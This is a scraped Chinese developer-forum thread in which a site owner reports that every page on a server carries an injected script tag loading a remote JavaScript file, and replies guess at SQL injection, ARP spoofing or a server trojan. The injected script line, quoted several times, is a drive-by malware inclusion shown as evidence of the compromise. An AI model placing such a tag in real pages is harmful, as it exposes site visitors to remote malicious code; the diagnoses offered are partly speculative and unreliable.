62,046
社区成员
发帖
与我相关
我的任务
分享被挂马了.但是文件没有修改.数据库没被注入..从那下的手??????
<script language=javascript src=http://www.zjhanda.net/admin/v64.js></script>
...全文
请发表友善的回复…
发表回复
昵称不好起 2011-09-28
- 打赏
- 举报
[Quote=引用 95 楼 hooverhuang 的回复:]
引用楼主 pdsnet 的回复:
JScript code
<script language=javascript src=http://www.zjhanda.net/admin/v64.js></script>
哈哈,你这个问题我也遇到过,我的网站也被人攻击了。。。。我忘了哪个检测工具的。。。
你程序里面肯定用了SQL字符串拼接的。。。你那不是挂马,是被SQL注入了……
[/Quote]
如何是sql注入,你想,整个服务器上的页面都出现这个情况,恐怕要考虑其他原因了
引用楼主 pdsnet 的回复:
JScript code
<script language=javascript src=http://www.zjhanda.net/admin/v64.js></script>
哈哈,你这个问题我也遇到过,我的网站也被人攻击了。。。。我忘了哪个检测工具的。。。
你程序里面肯定用了SQL字符串拼接的。。。你那不是挂马,是被SQL注入了……
[/Quote]
如何是sql注入,你想,整个服务器上的页面都出现这个情况,恐怕要考虑其他原因了
ming539940199 2010-08-12
- 打赏
- 举报
撞墙.引用错了...
ming539940199 2010-08-12
- 打赏
- 举报
[Quote=引用 46 楼 yao970953039 的回复:]
不懂,帮顶!!!
[/Quote]
这主意不错
不懂,帮顶!!!
[/Quote]
这主意不错
带你一起飞吧 2010-03-18
- 打赏
- 举报
[Quote=引用 16 楼 pdsnet 的回复:]
引用 7 楼 ch_weni 的回复:
不在文件中就是在数据库中,不可能找不到的
asp.net +sql2005 数据库 没有动过.网页文件没有动过.整个服务器上的全部出现这种情况了..
[/Quote]
你看看和你不同局域网的电脑访问有问题没!我这里以前也被改过,是别人装了ARP攻击工具造成的。
引用 7 楼 ch_weni 的回复:
不在文件中就是在数据库中,不可能找不到的
asp.net +sql2005 数据库 没有动过.网页文件没有动过.整个服务器上的全部出现这种情况了..
[/Quote]
你看看和你不同局域网的电脑访问有问题没!我这里以前也被改过,是别人装了ARP攻击工具造成的。
guyehanxinlei 2010-03-18
- 打赏
- 举报
应该是服务器中木马了!
Taiyangchen 2010-03-18
- 打赏
- 举报
旁注进去的
服务器有木马!
服务器有木马!
pdsnet 2010-03-18
- 打赏
- 举报
[Quote=引用 94 楼 alaigo 的回复:]
我告诉你吧。是有人趁你下班的时候打开你的计算机偷改的!!!!!!!!!!!!!!!!!!!!!!
哇哈哈,给分给分
[/Quote]
我告诉你吧。是有人趁你下班的时候打开你的计算机偷改的!!!!!!!!!!!!!!!!!!!!!!
哇哈哈,给分给分
[/Quote]
CODE163 2010-03-18
- 打赏
- 举报
实质上因为ARP病毒没有权限修改你机器上的文件,所以他只能通过在你和客户机之间修改传输的信息。
HooverHuang 2010-03-18
- 打赏
- 举报
推荐 老风的 帖子。。。。
http://topic.csdn.net/u/20090729/14/26381958-0d6e-4b90-bc90-d275e9621f93.html
http://topic.csdn.net/u/20090729/14/26381958-0d6e-4b90-bc90-d275e9621f93.html
CODE163 2010-03-18
- 打赏
- 举报
如果你的文件没有被修改建议你检测一下网络中ARP包是否异常 。看起来应该是ARP渗透。,
但是不排除是你的机器中病毒了,但是往往中病毒后是直接修改你机器上所有的网页文件,没见过这么干的。
ARP则是常用这种办法,通过欺骗服务器修改数据包造成的。所以文件也没有修改 数据库也没有,只是在传输过程中出了问题。
但是不排除是你的机器中病毒了,但是往往中病毒后是直接修改你机器上所有的网页文件,没见过这么干的。
ARP则是常用这种办法,通过欺骗服务器修改数据包造成的。所以文件也没有修改 数据库也没有,只是在传输过程中出了问题。
HooverHuang 2010-03-18
- 打赏
- 举报
[Quote=引用楼主 pdsnet 的回复:]
JScript code
<script language=javascript src=http://www.zjhanda.net/admin/v64.js></script>
[/Quote]
哈哈,你这个问题我也遇到过,我的网站也被人攻击了。。。。我忘了哪个检测工具的。。。
你程序里面肯定用了SQL字符串拼接的。。。你那不是挂马,是被SQL注入了。。。。
记住,参数化,写操作数据库方法的时候一定不能用字符串拼接。。。。。。
JScript code
<script language=javascript src=http://www.zjhanda.net/admin/v64.js></script>
[/Quote]
哈哈,你这个问题我也遇到过,我的网站也被人攻击了。。。。我忘了哪个检测工具的。。。
你程序里面肯定用了SQL字符串拼接的。。。你那不是挂马,是被SQL注入了。。。。
记住,参数化,写操作数据库方法的时候一定不能用字符串拼接。。。。。。
alaigo 2010-03-18
- 打赏
- 举报
我告诉你吧。是有人趁你下班的时候打开你的计算机偷改的!!!!!!!!!!!!!!!!!!!!!!
哇哈哈,给分给分
哇哈哈,给分给分
HatoLee 2010-03-18
- 打赏
- 举报
帮顶
回复内容太短了!
回复内容太短了!
maxiansheng 2010-03-18
- 打赏
- 举报
还行吧
zjj1211 2010-03-17
- 打赏
- 举报
帮不上忙,帮顶一下吧
jianke917 2010-03-17
- 打赏
- 举报
是否是IIS方面的问题或sql注入,没遇见过,关注ing……
plumisea 2010-03-17
- 打赏
- 举报
十有八九是ARP问题!
bourbon1795 2010-03-17
- 打赏
- 举报
应该不会吧
wcl2222 2010-03-17
- 打赏
- 举报
看看这篇文章对你是否有帮助
http://www.aspnethome.cn/?action-viewnews-itemid-32
http://www.aspnethome.cn/?action-viewnews-itemid-32
imfor 2010-03-17
- 打赏
- 举报
分拿来我给你演示一遍。加载更多回复(86)
